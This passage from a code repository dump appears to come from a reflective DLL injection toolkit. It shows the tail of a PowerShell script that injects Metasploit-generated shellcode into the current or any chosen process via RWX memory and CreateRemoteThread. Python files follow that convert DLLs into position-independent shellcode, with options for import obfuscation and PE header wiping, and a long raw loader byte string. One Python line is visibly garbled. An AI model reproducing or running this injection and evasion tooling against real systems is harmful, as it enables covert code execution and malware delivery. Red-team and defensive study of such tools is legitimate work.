348 | # Allocate RWX memory for the thread call stub
349 | $CallStubAddress = $VirtualAlloc.Invoke([IntPtr]::Zero, $CallStub.Length + 1, 0x3000, 0x40) # (Reserve|Commit, RWX)
350 | if (!$CallStubAddress)
351 | {
352 | Throw "Unable to allocate thread call stub."
353 | }
354 |
355 | Write-Verbose "Thread call stub memory reserved at 0x$($CallStubAddress.ToString("X$([IntPtr]::Size*2)"))"
356 |
357 | # Copy call stub to RWX buffer
358 | [System.Runtime.InteropServices.Marshal]::Copy($CallStub, 0, $CallStubAddress, $CallStub.Length)
359 |
360 | # Launch shellcode in it's own thread
361 | $ThreadHandle = $CreateThread.Invoke([IntPtr]::Zero, 0, $CallStubAddress, $BaseAddress, 0, [IntPtr]::Zero)
362 | if (!$ThreadHandle)
363 | {
364 | Throw "Unable to launch thread."
365 | }
366 |
367 | # Wait for shellcode thread to terminate
368 | $WaitForSingleObject.Invoke($ThreadHandle, 0xFFFFFFFF) | Out-Null
369 |
370 | $VirtualFree.Invoke($CallStubAddress, $CallStub.Length + 1, 0x8000) | Out-Null # MEM_RELEASE (0x8000)
371 | $VirtualFree.Invoke($BaseAddress, $Shellcode.Length + 1, 0x8000) | Out-Null # MEM_RELEASE (0x8000)
372 |
373 | Write-Verbose 'Shellcode injection complete!'
374 | }
375 |
376 | # A valid pointer to IsWow64Process will be returned if CPU is 64-bit
377 | $IsWow64ProcessAddr = Get-ProcAddress kernel32.dll IsWow64Process
378 |
379 | $AddressWidth = $null
380 |
381 | try {
382 | $AddressWidth = @(Get-WmiObject -Query 'SELECT AddressWidth FROM Win32_Processor')[0] | Select-Object -ExpandProperty AddressWidth
383 | } catch {
384 | throw 'Unable to determine OS processor address width.'
385 | }
386 |
387 | switch ($AddressWidth) {
388 | '32' {
389 | $64bitOS = $False
390 | }
391 |
392 | '64' {
393 | $64bitOS = $True
394 |
395 | $IsWow64ProcessDelegate = Get-DelegateType @([IntPtr], [Bool].MakeByRefType()) ([Bool])
396 | $IsWow64Process = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IsWow64ProcessAddr, $IsWow64ProcessDelegate)
397 | }
398 |
399 | default {
400 | throw 'Invalid OS address width detected.'
401 | }
402 | }
403 |
404 | if ([IntPtr]::Size -eq 4)
405 | {
406 | $PowerShell32bit = $true
407 | }
408 | else
409 | {
410 | $PowerShell32bit = $false
411 | }
412 |
413 | if ($PSBoundParameters['Shellcode'])
414 | {
415 | # Users passing in shellcode through the '-Shellcode' parameter are responsible for ensuring it targets
416 | # the correct architechture - x86 vs. x64. This script has no way to validate what you provide it.
417 | [Byte[]] $Shellcode32 = $Shellcode
418 | [Byte[]] $Shellcode64 = $Shellcode32
419 | }
420 | else
421 | {
422 | # Pop a calc... or whatever shellcode you decide to place in here
423 | # I sincerely hope you trust that this shellcode actually pops a calc...
424 | # Insert your shellcode here in the for 0xXX,0xXX,...
425 | # 32-bit payload
426 | # msfpayload windows/exec CMD="cmd /k calc" EXITFUNC=thread
427 | [Byte[]] $Shellcode32 = @(0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,
428 | 0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,
429 | 0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,
430 | 0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,
431 | 0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,
432 | 0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,
433 | 0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,
434 | 0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,
435 | 0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,
436 | 0x6a,0x01,0x8d,0x85,0xb9,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,0x87,0xff,0xd5,
437 | 0xbb,0xe0,0x1d,0x2a,0x0a,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x06,0x7c,0x0a,
438 | 0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x53,0xff,0xd5,0x63,
439 | 0x61,0x6c,0x63,0x00)
440 |
441 | # 64-bit payload
442 | # msfpayload windows/x64/exec CMD="calc" EXITFUNC=thread
443 | [Byte[]] $Shellcode64 = @(0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,
444 | 0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,
445 | 0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,
446 | 0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,
447 | 0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,0x88,
448 | 0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,
449 | 0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,
450 | 0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,
451 | 0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,
452 | 0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,
453 | 0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,
454 | 0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,
455 | 0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,
456 | 0x00,0x00,0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,
457 | 0x6f,0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,
458 | 0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,
459 | 0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,0x63,0x00)
460 | }
461 |
462 | if ( $PSBoundParameters['ProcessID'] )
463 | {
464 | # Inject shellcode into the specified process ID
465 | $OpenProcessAddr = Get-ProcAddress kernel32.dll OpenProcess
466 | $OpenProcessDelegate = Get-DelegateType @([UInt32], [Bool], [UInt32]) ([IntPtr])
467 | $OpenProcess = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenProcessAddr, $OpenProcessDelegate)
468 | $VirtualAllocExAddr = Get-ProcAddress kernel32.dll VirtualAllocEx
469 | $VirtualAllocExDelegate = Get-DelegateType @([IntPtr], [IntPtr], [Uint32], [UInt32], [UInt32]) ([IntPtr])
470 | $VirtualAllocEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocExAddr, $VirtualAllocExDelegate)
471 | $WriteProcessMemoryAddr = Get-ProcAddress kernel32.dll WriteProcessMemory
472 | $WriteProcessMemoryDelegate = Get-DelegateType @([IntPtr], [IntPtr], [Byte[]], [UInt32], [UInt32].MakeByRefType()) ([Bool])
473 | $WriteProcessMemory = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WriteProcessMemoryAddr, $WriteProcessMemoryDelegate)
474 | $CreateRemoteThreadAddr = Get-ProcAddress kernel32.dll CreateRemoteThread
475 | $CreateRemoteThreadDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr])
476 | $CreateRemoteThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateRemoteThreadAddr, $CreateRemoteThreadDelegate)
477 | $CloseHandleAddr = Get-ProcAddress kernel32.dll CloseHandle
478 | $CloseHandleDelegate = Get-DelegateType @([IntPtr]) ([Bool])
479 | $CloseHandle = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CloseHandleAddr, $CloseHandleDelegate)
480 |
481 | Write-Verbose "Injecting shellcode into PID: $ProcessId"
482 |
483 | if ( $Force -or $psCmdlet.ShouldContinue( 'Do you wish to carry out your evil plans?',
484 | "Injecting shellcode injecting into $((Get-Process -Id $ProcessId).ProcessName) ($ProcessId)!" ) )
485 | {
486 | Inject-RemoteShellcode $ProcessId
487 | }
488 | }
489 | else
490 | {
491 | # Inject shellcode into the currently running PowerShell process
492 | $VirtualAllocAddr = Get-ProcAddress kernel32.dll VirtualAlloc
493 | $VirtualAllocDelegate = Get-DelegateType @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])
494 | $VirtualAlloc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocAddr, $VirtualAllocDelegate)
495 | $VirtualFreeAddr = Get-ProcAddress kernel32.dll VirtualFree
496 | $VirtualFreeDelegate = Get-DelegateType @([IntPtr], [Uint32], [UInt32]) ([Bool])
497 | $VirtualFree = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualFreeAddr, $VirtualFreeDelegate)
498 | $CreateThreadAddr = Get-ProcAddress kernel32.dll CreateThread
499 | $CreateThreadDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr])
500 | $CreateThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateThreadAddr, $CreateThreadDelegate)
501 | $WaitForSingleObjectAddr = Get-ProcAddress kernel32.dll WaitForSingleObject
502 | $WaitForSingleObjectDelegate = Get-DelegateType @([IntPtr], [Int32]) ([Int])
503 | $WaitForSingleObject = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WaitForSingleObjectAddr, $WaitForSingleObjectDelegate)
504 |
505 | Write-Verbose "Injecting shellcode into PowerShell"
506 |
507 | if ( $Force -or $psCmdlet.ShouldContinue( 'Do you wish to carry out your evil plans?',
508 | "Injecting shellcode into the running PowerShell process!" ) )
509 | {
510 | Inject-LocalShellcode
511 | }
512 | }
513 | }
514 |
--------------------------------------------------------------------------------
/Python/ConvertToShellcode.py:
--------------------------------------------------------------------------------
1 | import argparse
2 | from ShellcodeRDI import *
3 |
4 | __version__ = '1.2'
5 |
6 | def main():
7 | parser = argparse.ArgumentParser(description='RDI Shellcode Converter', conflict_handler='resolve')
8 | parser.add_argument('-v', '--version', action='version', version='%(prog)s Version: ' + __version__)
9 | parser.add_argument('input_dll', help='DLL to convert to shellcode')
10 | parser.add_argument('-f', '--function-name', dest='function_name', help='The function to call after DllMain', default='SayHello')
11 | parser.add_argument('-u', '--user-data', dest='user_data', help='Data to pass to the target function', default='dave')
12 | parser.add_argument('-c', '--clear-header', dest='clear_header', action='store_true', help='Clear the PE header on load')
13 | parser.add_argument('-b', '--pass-shellcode-base', dest='pass_shellcode_base', action='store_true', help='Pass shellcode base address to exported function')
14 | parser.add_argument('-i', '--obfuscate-imports', dest='obfuscate_imports', action='store_true', help='Randomize import dependency load order', default=False)
15 | parser.add_argument('-d', '--import-delay', dest='import_delay', help='Number of seconds to pause between loading imports', type=int, default=0)
16 | parser.add_argument('-of', '--output-format', dest='output_format', help='Output format of the shellcode (e.g. raw,string)', type=str, default="raw")
17 |
18 | arguments = parser.parse_args()
19 |
20 | input_dll = arguments.input_dll
21 | output_bin = input_dll.replace('.dll', '.bin')
22 |
23 | dll = open(arguments.input_dll, 'rb').read()
24 |
25 | flags = 0
26 |
27 | if arguments.clear_header:
28 | flags |= 0x1
29 |
30 | if arguments.obfuscate_imports:
31 | flags = flags | 0x4 | arguments.import_delay << 16
32 |
33 | if arguments.pass_shellcode_base:
34 | flags |= 0x8
35 |
36 | converted_dll = ConvertToShellcode(dll, HashFunctionName(arguments.function_name), arguments.user_data.encode(), flags)
37 |
38 | if arguments.output_format=="raw":
39 | print('Creating Shellcode: {}'.format(output_bin))
40 | with open(output_bin, 'wb') as f:
41 | f.write(converted_dll)
42 |
43 | elif arguments.output_format=="string":
44 | output_bin = input_dll.replace('.dll', '.txt')
45 | converted_dll_text ="".join([r"\x{}".format(str(format(c,'02x'))) for c in converted_dll])
46 |
47 | print('Creating Shellcode: {}'.format(output_bin))
48 | with open(output_bin, 'w') as f:
49 | f.write(converted_dll_text)
50 |
51 | if __name__ == '__main__':
52 | main()
53 |
--------------------------------------------------------------------------------
/Python/Python.pyproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Debug
5 | 2.0
6 | be642266-f34d-43c3-b6e4-eebf8e489519
7 |
8 |
9 |
10 |
11 |
12 |
13 | .
14 | .
15 | Python
16 | RDIShellcodePyLoader
17 |
18 |
19 | true
20 | false
21 |
22 |
23 | true
24 | false
25 |
26 |
27 | 10.0
28 |
29 |
30 |
31 |
32 |
33 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
--------------------------------------------------------------------------------
/Python/ShellcodeRDI.py:
--------------------------------------------------------------------------------
1 | import sys
2 |
3 | if sys.version_info < (3,0):
4 | print("[!] Sorry, requires Python 3.x")
5 | sys.exit(1)
6 |
7 | import struct
8 | from struct import pack
9 |
10 | MACHINE_IA64=512
11 | MACHINE_AMD64=34404
12 |
13 | def is64BitDLL(bytes):
14 | header_offset = struct.unpack("> r_bits%max_bits) | \
22 | (val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1))
23 |
24 | def HashFunctionName(name, module = None):
25 |
26 | function = name.encode() + b'\x00'
27 |
28 | if(module):
29 | module = module.upper().encode('UTF-16LE') + b'\x00\x00'
30 |
31 | functionHash = 0
32 |
33 | for b in function:
34 | functionHash = ror(functionHash, 13, 32)
35 | functionHash += b
36 |
37 | moduleHash = 0
38 |
39 | for b in module:
40 | moduleHash = ror(moduleHash, 13, 32)
41 | moduleHash += b
42 |
43 | functionHash += moduleHash
44 |
45 | if functionHash > 0xFFFFFFFF: functionHash -= 0x100000000
46 |
47 | else:
48 | functionHash = 0
49 |
50 | for b in function:
51 | functionHash = ror(functionHash, 13, 32)
52 | functionHash += b
53 |
54 | return functionHash
55 |
56 | def ConvertToShellcode(dllBytes, functionHash=0x10, userData=b'None', flags=0):
57 |
58 | #MARKER:S
59 | rdiShellcode32 = b'\x81\xEC\x14\x01\x00\x00\x53\x55\x56\x57\x6A\x6B\x58\x6A\x65\x66\x89\x84\x24\xCC\x00\x00\x00\x33\xED\x58\x6A\x72\x59\x6A\x6E\x5B\x6A\x6C\x5A\x6A\x33\x66\x89\x84\x24\xCE\x00\x00\x00\x66\x89\x84\x24\xD4\x00\x00\x00\x58\x6A\x32\x66\x89\x84\x24\xD8\x00\x00\x00\x58\x6A\x2E\x66\x89\x84\x24\xDA\x00\x00\x00\x58\x6A\x64\x66\x89\x84\x24\xDC\x00\x00\x00\x58\x89\xAC\x24\xB4\x00\x00\x00\x89\x6C\x24\x38\x89\xAC\x24\xBC\x00\x00\x00\x89\xAC\x24\xC4\x00\x00\x00\x89\xAC\x24\xB8\x00\x00\x00\x89\xAC\x24\xB0\x00\x00\x00\x89\xAC\x24\xE0\x00\x00\x00\x66\x89\x8C\x24\xCC\x00\x00\x00\x66\x89\x9C\x24\xCE\x00\x00\x00\x66\x89\x94\x24\xD2\x00\x00\x00\x66\x89\x84\x24\xDA\x00\x00\x00\x66\x89\x94\x24\xDC\x00\x00\x00\x66\x89\x94\x24\xDE\x00\x00\x00\xC6\x44\x24\x3C\x53\x88\x54\x24\x3D\x66\xC7\x44\x24\x3E\x65\x65\xC6\x44\x24\x40\x70\x66\xC7\x44\x24\x50\x4C\x6F\xC6\x44\x24\x52\x61\x88\x44\x24\x53\x66\xC7\x44\x24\x54\x4C\x69\xC6\x44\x24\x56\x62\x88\x4C\x24\x57\xC6\x44\x24\x58\x61\x88\x4C\x24\x59\x66\xC7\x44\x24\x5A\x79\x41\x66\xC7\x44\x24\x44\x56\x69\x88\x4C\x24\x46\x66\xC7\x44\x24\x47\x74\x75\xC6\x44\x24\x49\x61\x88\x54\x24\x4A\xC6\x44\x24\x4B\x41\x88\x54\x24\x4C\x88\x54\x24\x4D\x66\xC7\x44\x24\x4E\x6F\x63\x66\xC7\x44\x24\x5C\x56\x69\x88\x4C\x24\x5E\x66\xC7\x44\x24\x5F\x74\x75\xC6\x44\x24\x61\x61\x88\x54\x24\x62\xC6\x44\x24\x63\x50\x88\x4C\x24\x64\xC7\x44\x24\x65\x6F\x74\x65\x63\xC6\x44\x24\x69\x74\xC6\x84\x24\x94\x00\x00\x00\x46\x88\x94\x24\x95\x00\x00\x00\xC7\x84\x24\x96\x00\x00\x00\x75\x73\x68\x49\x88\x9C\x24\x9A\x00\x00\x00\x66\xC7\x84\x24\x9B\x00\x00\x00\x73\x74\x88\x8C\x24\x9D\x00\x00\x00\xC7\x84\x24\x9E\x00\x00\x00\x75\x63\x74\x69\xC6\x84\x24\xA2\x00\x00\x00\x6F\x6A\x65\x59\x88\x8C\x24\xA8\x00\x00\x00\x88\x4C\x24\x6D\x88\x4C\x24\x74\x88\x4C\x24\x79\x88\x8C\x24\x92\x00\x00\x00\xB9\x13\x9C\xBF\xBD\x88\x9C\x24\xA3\x00\x00\x00\xC7\x84\x24\xA4\x00\x00\x00\x43\x61\x63\x68\xC6\x44\x24\x6C\x47\xC7\x44\x24\x6E\x74\x4E\x61\x74\x66\xC7\x44\x24\x72\x69\x76\xC7\x44\x24\x75\x53\x79\x73\x74\x66\xC7\x44\x24\x7A\x6D\x49\x88\x5C\x24\x7C\x66\xC7\x44\x24\x7D\x66\x6F\x66\xC7\x84\x24\x80\x00\x00\x00\x52\x74\x88\x94\x24\x82\x00\x00\x00\xC6\x84\x24\x83\x00\x00\x00\x41\x88\x84\x24\x84\x00\x00\x00\x88\x84\x24\x85\x00\x00\x00\x66\xC7\x84\x24\x86\x00\x00\x00\x46\x75\x88\x9C\x24\x88\x00\x00\x00\xC7\x84\x24\x89\x00\x00\x00\x63\x74\x69\x6F\x88\x9C\x24\x8D\x00\x00\x00\x66\xC7\x84\x24\x8E\x00\x00\x00\x54\x61\xC6\x84\x24\x90\x00\x00\x00\x62\x88\x94\x24\x91\x00\x00\x00\xE8\x49\x08\x00\x00\xB9\xB5\x41\xD9\x5E\x8B\xF0\xE8\x3D\x08\x00\x00\x8B\xD8\x8D\x84\x24\xC8\x00\x00\x00\x6A\x18\x89\x84\x24\xEC\x00\x00\x00\x58\x66\x89\x84\x24\xE6\x00\x00\x00\x66\x89\x84\x24\xE4\x00\x00\x00\x8D\x44\x24\x1C\x50\x8D\x84\x24\xE8\x00\x00\x00\x89\x5C\x24\x38\x50\x55\x55\xFF\xD6\x6A\x0C\x5F\x8D\x44\x24\x44\x66\x89\x7C\x24\x10\x89\x44\x24\x14\x8D\x44\x24\x38\x50\x55\x8D\x44\x24\x18\x66\x89\x7C\x24\x1A\x50\xFF\x74\x24\x28\xFF\xD3\x6A\x0E\x58\x66\x89\x44\x24\x10\x66\x89\x44\x24\x12\x8D\x44\x24\x5C\x89\x44\x24\x14\x8D\x84\x24\xB8\x00\x00\x00\x50\x55\x8D\x44\x24\x18\x50\xFF\x74\x24\x28\xFF\xD3\x6A\x15\x58\x66\x89\x44\x24\x10\x66\x89\x44\x24\x12\x8D\x84\x24\x94\x00\x00\x00\x89\x44\x24\x14\x8D\x84\x24\xBC\x00\x00\x00\x50\x55\x8D\x44\x24\x18\x50\xFF\x74\x24\x28\xFF\xD3\x6A\x13\x5E\x8D\x44\x24\x6C\x66\x89\x74\x24\x10\x89\x44\x24\x14\x8D\x84\x24\xC4\x00\x00\x00\x50\x55\x8D\x44\x24\x18\x66\x89\x74\x24\x1A\x50\xFF\x74\x24\x28\xFF\xD3\x6A\x05\x58\x66\x89\x44\x24\x10\x66\x89\x44\x24\x12\x8D\x44\x24\x3C\x89\x44\x24\x14\x8D\x84\x24\xB0\x00\x00\x00\x50\x55\x8D\x44\x24\x18\x50\xFF\x74\x24\x28\xFF\xD3\x8D\x84\x24\x80\x00\x00\x00\x66\x89\x74\x24\x10\x89\x44\x24\x14\x8D\x84\x24\xE0\x00\x00\x00\x50\x55\x8D\x44\x24\x18\x66\x89\x74\x24\x1A\x50\xFF\x74\x24\x28\xFF\xD3\x8D\x44\x24\x50\x66\x89\x7C\x24\x10\x89\x44\x24\x14\x8D\x84\x24\xB4\x00\x00\x00\x50\x55\x8D\x44\x24\x18\x66\x89\x7C\x24\x1A\x50\xFF\x74\x24\x28\xFF\xD3\x39\x6C\x24\x38\x0F\x84\xD2\x06\x00\x00\x39\xAC\x24\xB8\x00\x00\x00\x0F\x84\xC5\x06\x00\x00\x39\xAC\x24\xB0\x00\x00\x00\x0F\x84\xB8\x06\x00\x00\x39\xAC\x24\xBC\x00\x00\x00\x0F\x84\xAB\x06\x00\x00\x8B\xAC\x24\xC4\x00\x00\x00\x85\xED\x0F\x84\x9C\x06\x00\x00\x8B\xBC\x24\x28\x01\x00\x00\x8B\x77\x3C\x03\xF7\x81\x3E\x50\x45\x00\x00\x0F\x85\x84\x06\x00\x00\xB8\x4C\x01\x00\x00\x66\x39\x46\x04\x0F\x85\x75\x06\x00\x00\x8B\x46\x38\xA8\x01\x0F\x85\x6A\x06\x00\x00\x0F\xB7\x4E\x14\x33\xDB\x0F\xB7\x56\x06\x83\xC1\x24\x85\xD2\x74\x28\x03\xCE\x83\x79\x04\x00\x8B\x39\x74\x03\x8B\x41\x04\x03\xC7\x3B\xC3\x0F\x46\xC3\x83\xC1\x28\x8B\xD8\x8B\x46\x38\x83\xEA\x01\x75\xE1\x8B\xBC\x24\x28\x01\x00\x00\x8D\x84\x24\x00\x01\x00\x00\x50\xFF\xD5\x8B\x8C\x24\x04\x01\x00\x00\x8D\x51\xFF\x8D\x69\xFF\xF7\xD2\x03\x6E\x50\x8D\x41\xFF\x03\xC3\x23\xEA\x23\xC2\x3B\xE8\x0F\x85\x04\x06\x00\x00\x6A\x04\x68\x00\x30\x00\x00\x55\xFF\x76\x34\xFF\x54\x24\x48\x8B\xD8\x89\x5C\x24\x30\x85\xDB\x75\x13\x6A\x04\x68\x00\x30\x00\x00\x55\x50\xFF\x54\x24\x48\x8B\xD8\x89\x44\x24\x30\xF6\x84\x24\x3C\x01\x00\x00\x01\x74\x23\x8B\x47\x3C\x89\x43\x3C\x8B\x4F\x3C\x3B\x4E\x54\x73\x2E\x8B\xEF\x8D\x14\x0B\x2B\xEB\x8A\x04\x2A\x41\x88\x02\x42\x3B\x4E\x54\x72\xF4\xEB\x19\x33\xED\x39\x6E\x54\x76\x12\x8B\xD7\x8B\xCB\x2B\xD3\x8A\x04\x11\x45\x88\x01\x41\x3B\x6E\x54\x72\xF4\x8B\x6B\x3C\x33\xC9\x03\xEB\x89\x4C\x24\x18\x33\xC0\x89\x6C\x24\x24\x0F\xB7\x75\x14\x83\xC6\x28\x66\x3B\x45\x06\x73\x3E\x03\xF5\x83\x64\x24\x20\x00\x83\x3E\x00\x76\x22\x8B\x6C\x24\x20\x8B\x46\x04\x8D\x14\x2B\x8B\x4E\xFC\x03\xC5\x45\x8A\x04\x38\x88\x04\x0A\x3B\x2E\x72\xEA\x8B\x6C\x24\x24\x8B\x4C\x24\x18\x0F\xB7\x45\x06\x41\x83\xC6\x28\x89\x4C\x24\x18\x3B\xC8\x72\xC4\x8B\xC3\x2B\x45\x34\x89\x44\x24\x20\x0F\x84\xB8\x00\x00\x00\x83\xBD\xA4\x00\x00\x00\x00\x0F\x84\xAB\x00\x00\x00\x8B\xB5\xA0\x00\x00\x00\x03\xF3\x83\x3E\x00\x0F\x84\x9A\x00\x00\x00\x8B\xE8\x8D\x7E\x08\xEB\x74\x0F\xB7\x0F\x66\x8B\xC1\x0F\xB7\xD1\x66\xC1\xE8\x0C\x66\x83\xF8\x0A\x75\x20\x8B\x16\x81\xE1\xFF\x0F\x00\x00\x89\x4C\x24\x20\x8D\x04\x1A\x8B\x0C\x08\x8D\x04\x1A\x8B\x54\x24\x20\x03\xCD\x89\x0C\x10\xEB\x3C\x66\x83\xF8\x03\x75\x0F\x8B\x06\x81\xE2\xFF\x0F\x00\x00\x03\xD3\x01\x2C\x02\xEB\x27\x33\xC9\x41\x66\x3B\xC1\x75\x07\x8B\xC5\xC1\xE8\x10\xEB\x0B\x6A\x02\x59\x66\x3B\xC1\x75\x10\x0F\xB7\xC5\x8B\x0E\x81\xE2\xFF\x0F\x00\x00\x03\xD3\x01\x04\x0A\x6A\x02\x58\x03\xF8\x8B\x46\x04\x03\xC6\x3B\xF8\x75\x83\x83\x3F\x00\x8B\xF7\x0F\x85\x73\xFF\xFF\xFF\x8B\x6C\x24\x24\x8B\xBC\x24\x28\x01\x00\x00\x83\xBD\x84\x00\x00\x00\x00\x0F\x84\xEF\x01\x00\x00\x8B\xB5\x80\x00\x00\x00\x33\xC0\x89\x84\x24\xAC\x00\x00\x00\x8D\x0C\x1E\x89\x4C\x24\x20\x83\xC1\x0C\x39\x01\x74\x10\x8D\x49\x14\x40\x83\x39\x00\x75\xF7\x89\x84\x24\xAC\x00\x00\x00\xF6\x84\x24\x3C\x01\x00\x00\x04\x8B\xD6\x0F\x84\xCF\x00\x00\x00\x33\xC9\x41\x3B\xC1\x0F\x86\xC4\x00\x00\x00\x8B\x8C\x24\x3C\x01\x00\x00\x8D\x50\xFF\x83\xA4\x24\xC0\x00\x00\x00\x00\x89\x54\x24\x28\x8B\xD6\xC1\xE9\x10\x8D\x70\xFF\x89\x4C\x24\x18\x85\xF6\x0F\x84\xA2\x00\x00\x00\x8B\x74\x24\x20\x8B\xDE\x8B\xAC\x24\xC0\x00\x00\x00\x8B\xC8\x69\xFF\xFD\x43\x03\x00\x2B\xCD\x33\xD2\xB8\xFF\x7F\x00\x00\xF7\xF1\x81\xC7\xC3\x9E\x26\x00\x33\xD2\x89\xBC\x24\x28\x01\x00\x00\x6A\x05\x8D\x48\x01\x8B\xC7\xC1\xE8\x10\x8D\xBC\x24\xF0\x00\x00\x00\x25\xFF\x7F\x00\x00\xF7\xF1\x59\x03\xC5\x6B\xC0\x14\x6A\x05\x03\xC6\x45\x8B\xF0\xF3\xA5\x59\x8B\xF3\x8B\xF8\x8B\x84\x24\xAC\x00\x00\x00\xF3\xA5\x6A\x05\x8B\xFB\x8D\xB4\x24\xF0\x00\x00\x00\x59\xF3\xA5\x8B\xBC\x24\x28\x01\x00\x00\x83\xC3\x14\x8B\x74\x24\x20\x3B\x6C\x24\x28\x72\x87\x8B\x6C\x24\x24\x8B\x5C\x24\x30\x8B\x4C\x24\x18\x8B\x95\x80\x00\x00\x00\xEB\x08\x8B\x4C\x24\x28\x89\x4C\x24\x18\x8D\x3C\x1A\x8B\x57\x0C\x89\x7C\x24\x30\x85\xD2\x0F\x84\xC9\x00\x00\x00\x8B\xC1\x23\x84\x24\x3C\x01\x00\x00\x83\xE0\x04\x89\x84\x24\xC0\x00\x00\x00\x8D\x04\x1A\x50\xFF\x94\x24\xB8\x00\x00\x00\x8B\xD0\x89\x54\x24\x1C\x8B\x37\x8B\x6F\x10\x03\xF3\x03\xEB\x8B\x0E\x85\xC9\x74\x5A\x8B\x7C\x24\x34\x85\xC9\x79\x09\x0F\xB7\x06\x55\x50\x6A\x00\xEB\x30\x83\xC1\x02\x33\xC0\x03\xCB\x89\x4C\x24\x28\x38\x01\x74\x0B\x40\x41\x80\x39\x00\x75\xF9\x8B\x4C\x24\x28\x55\x66\x89\x44\x24\x14\x66\x89\x44\x24\x16\x8D\x44\x24\x14\x6A\x00\x89\x4C\x24\x1C\x50\x52\xFF\xD7\x83\xC6\x04\x83\xC5\x04\x8B\x0E\x85\xC9\x74\x06\x8B\x54\x24\x1C\xEB\xAE\x8B\x7C\x24\x30\x83\xBC\x24\xC0\x00\x00\x00\x00\x74\x1C\x33\xC0\x40\x39\x84\x24\xAC\x00\x00\x00\x76\x10\x69\x44\x24\x18\xE8\x03\x00\x00\x50\xFF\x94\x24\xB4\x00\x00\x00\x8B\x57\x20\x83\xC7\x14\x89\x7C\x24\x30\x85\xD2\x0F\x85\x4E\xFF\xFF\xFF\x8B\x6C\x24\x24\x83\xBD\xE4\x00\x00\x00\x00\x6A\x20\x5A\x0F\x84\xAF\x00\x00\x00\x8B\x85\xE0\x00\x00\x00\x83\xC0\x04\x03\xC3\x89\x44\x24\x18\x8B\x00\x85\xC0\x0F\x84\x96\x0